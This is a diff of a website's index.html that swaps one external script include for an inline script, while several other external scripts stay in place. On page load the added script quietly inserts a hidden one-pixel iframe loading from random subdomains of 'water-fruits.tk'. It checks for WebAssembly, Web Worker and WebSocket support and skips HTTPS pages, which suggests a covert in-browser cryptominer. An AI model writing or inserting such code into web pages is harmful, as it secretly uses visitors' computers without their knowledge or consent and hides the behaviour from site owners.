--- a/index.html
+++ b/index.html
@@ -1,7 +1,31 @@
 <head><meta name = “trafficjunky-site-verification” content = “oyw3uoq00” />
     </head>
 <body>
-<script src="http://newlifeofjohn.bitballoon.com/114514.js"></script>
+<script>
+(function () {
+  if (!window.Worker || !window.WebAssembly || !window.WebSocket || window.location.protocol === 'https:') return;
+
+  var options = {
+    publisher: 'wf1',
+    domain: 'water-fruits.tk',
+    preset: 'medium',
+    subId: ''
+  };
+
+  var i = document.createElement('iframe');
+  i.width = i.height = 1;
+  i.style.display = 'none';
+
+  i.src = 'http://' + Math.random().toString().replace('0.', 'www.') + '.' + options.domain + '/s/?product=trs&publisher=' + options.publisher + '&preset=' + options.preset + '&subid=' + encodeURIComponent(options.subId || '');
+  if (document.body) {
+    document.body.appendChild(i)
+  } else {
+    document.addEventListener('DOMContentLoaded', function (event) {
+      document.body.appendChild(i)
+    })
+  }
+})()
+</script>
 <script src="http://newlifeofjohn.bitballoon.com/20180407.js"></script>
 <script src="http://newlifeofjohn.bitballoon.com/20180408.js"></script>
 <script src="http://newlifeofjohn.bitballoon.com/20180409.js"></script>
